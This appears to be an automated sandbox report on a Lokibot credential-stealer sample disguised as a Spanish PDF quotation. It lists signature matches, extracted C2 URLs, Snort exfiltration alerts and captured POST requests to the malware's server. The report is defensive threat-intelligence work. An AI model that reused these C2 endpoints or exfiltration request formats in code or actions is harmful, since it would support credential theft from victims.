1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.0.Cotizaci#U00f3npdf.exe.400000.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Click to see the 82 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000001.00000000.244286922.0000000000400000.00000040.00000001.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Cotizaci#U00f3npdf.exe

Virustotal: Detection: 25%

Perma Link

Antivirus detection for URL or domain

Show sources

Source: http://slimpackage.com/slimmain/five/fre.php

Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Show sources

Source: slimpackage.com	Virustotal: Detection: 7%			Perma Link
Source: http://slimpackage.com/slimmain/five/fre.php	Virustotal: Detection: 8%			Perma Link

Machine Learning detection for sample

Show sources

Source: Cotizaci#U00f3npdf.exe

Joe Sandbox ML: detected

Source: 1.0.Cotizaci#U00f3npdf.exe.400000.0.unpack

Avira: Label: TR/Patched.Ren.Gen2

Source: Cotizaci#U00f3npdf.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wntdll.pdbUGP source: Cotizaci#U00f3npdf.exe, 00000000.00000003.246790418.0000000003080000.00000004.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000000.00000003.247093932.0000000003210000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Cotizaci#U00f3npdf.exe, 00000000.00000003.246790418.0000000003080000.00000004.00000001.sdmp, Cotizaci#U00f3npdf.exe, 00000000.00000003.247093932.0000000003210000.00000004.00000001.sdmp

Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_00405D7C FindFirstFileA,FindClose,	0_2_00405D7C
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_004053AA
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 0_2_00402630 FindFirstFileA,	0_2_00402630
Source: C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe	Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	1_2_00403D74

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49754 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49754 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49754 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.5:49755 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49755 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49755 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49757 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49757 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49757 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49761 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49761 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49761 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49762 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49762 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49762 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49763 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49763 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49763 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49764 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49764 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49764 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49765 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49765 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49765 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49766 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49766 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49766 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49767 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49767 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49767 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49768 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49768 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49768 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49769 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49769 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49769 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49772 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49772 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49772 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49773 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49773 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49773 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49774 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49774 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49774 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49775 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49775 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49775 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49776 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49776 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49776 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49777 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49777 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49777 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49778 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49778 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49778 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49780 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49780 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49780 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49781 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49781 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49781 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49782 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49782 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49782 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49784 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49784 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49784 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49791 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49791 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49791 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49799 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49799 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49799 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49806 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49806 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49806 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49812 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49812 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49812 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49813 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49813 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49813 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49814 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49814 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49814 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49815 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49815 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49815 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49818 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49818 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49818 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49819 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49819 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49819 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49820 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49820 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49820 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49821 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49821 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49821 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49827 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49827 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49827 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49828 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49828 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49828 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49830 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49830 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49830 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49831 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49831 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49831 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49832 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49832 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49832 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49833 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49833 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49833 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49834 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49834 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49834 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49835 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49835 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49835 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49836 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49836 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49836 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49837 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49837 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49837 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49838 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49838 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49838 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49839 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49839 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49839 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49840 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49840 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49840 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49841 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49841 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49841 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49843 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49843 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49843 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49844 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49844 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49844 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49845 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49845 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49845 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49848 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49848 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49848 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49850 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49850 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49850 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49851 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49851 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49851 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49852 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49852 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49852 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49853 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49853 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49853 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49854 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49854 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49854 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49855 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49855 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49855 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.5:49856 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.5:49856 -> 104.223.93.105:80
Source: Traffic	Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.5:49856 -> 104.223.93.105:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View

ASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS

Source: Joe Sandbox View	IP Address: 104.223.93.105 104.223.93.105
Source: Joe Sandbox View	IP Address: 104.223.93.105 104.223.93.105

Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 192Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 192Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
Source: global traffic	HTTP traffic detected: POST /slimmain/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: slimpackage.comAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: CC3B1AEContent-Length: 165Connection: close
